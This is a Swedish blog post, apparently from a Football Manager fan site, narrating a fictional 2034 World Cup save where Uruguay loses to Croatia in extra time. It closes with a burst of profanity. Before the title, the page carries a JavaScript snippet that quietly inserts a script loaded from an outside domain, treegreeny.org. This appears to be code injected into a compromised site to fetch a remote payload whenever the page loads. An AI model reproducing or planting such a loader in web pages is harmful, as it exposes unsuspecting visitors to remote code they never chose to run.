;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dags för reflektion.. – FMSweden
Meny Stäng

Dags för reflektion..

Devran NH Bagis har numera blivit förbundskapten för Uruguay. VM 2034 skulle börja med en stjärnsmäll. Thailand stod för motståndet och det blev hela nio mål i matchen.

Turkiske demontränaren fick se sitt Uruguay göra hela 9-0 i VM-premiären mot Thailand. Matías Antúnez gjorde hattrick på 20 minuter i början av matchen och sen trillade målen in i en stadig takt mest hela matchen.

Andra matchen skulle dock bli jobbigare, då England stod för motståndet. Anförda av Jude Bellingham var England alldeles för bra, vilket slutresultatet 1-3 vittnade om.

Som upplägget var, med trelagsgrupper, så var ändå Uruguay klara för slutspel och i 16-delsfinal. Kroatien skulle stå för motståndet och det skulle bli enorm dramatik.

Första halvlek är jämn och det står 0-0 i paus.

Andra halvlek börjar med att Kroatien gör 1-0 och det resultatet står sig sent in i matchen. Devran gör två ändringar och börjar skicka in bollar i straffområdet. På ett av alla inlägg nickar Martin Mederos bollen i stolpen och på returen gör Mauro Piriz 1-1. Minuten va 84 och Uruguay var tillbaka i matchen.

I matchen sista minut drar Kroatiens Drazen Glavina på sig ett rött kort och det betyder att den följande förlängningen skall spelas 11-10 i Uruguays fördel.

Det är nu det ska hända, Bagis gäng trycker in bollar i straffområdet, men med tur och skicklighet fredar sig kroaterna. Matchen är på väg mot straffar och Devran NH Bagis börjar fundera på straffskyttar och plockar genast ut tre man. Det är då det händer..

Kroatien får en frispark på egen planhalva. Uruguay står lite högt med sin backlinje och kroaterna smäller in bollen mot straffområdet. En nickskarv, ett mottag och ett skott senare är tomheten total. Kroatien gör 2-1 i 121:a minuten.

Fuck allt, fuck spelet, fuck Kroatien, fuck backlinjen som stod för högt, FUCK FUCK FUCK.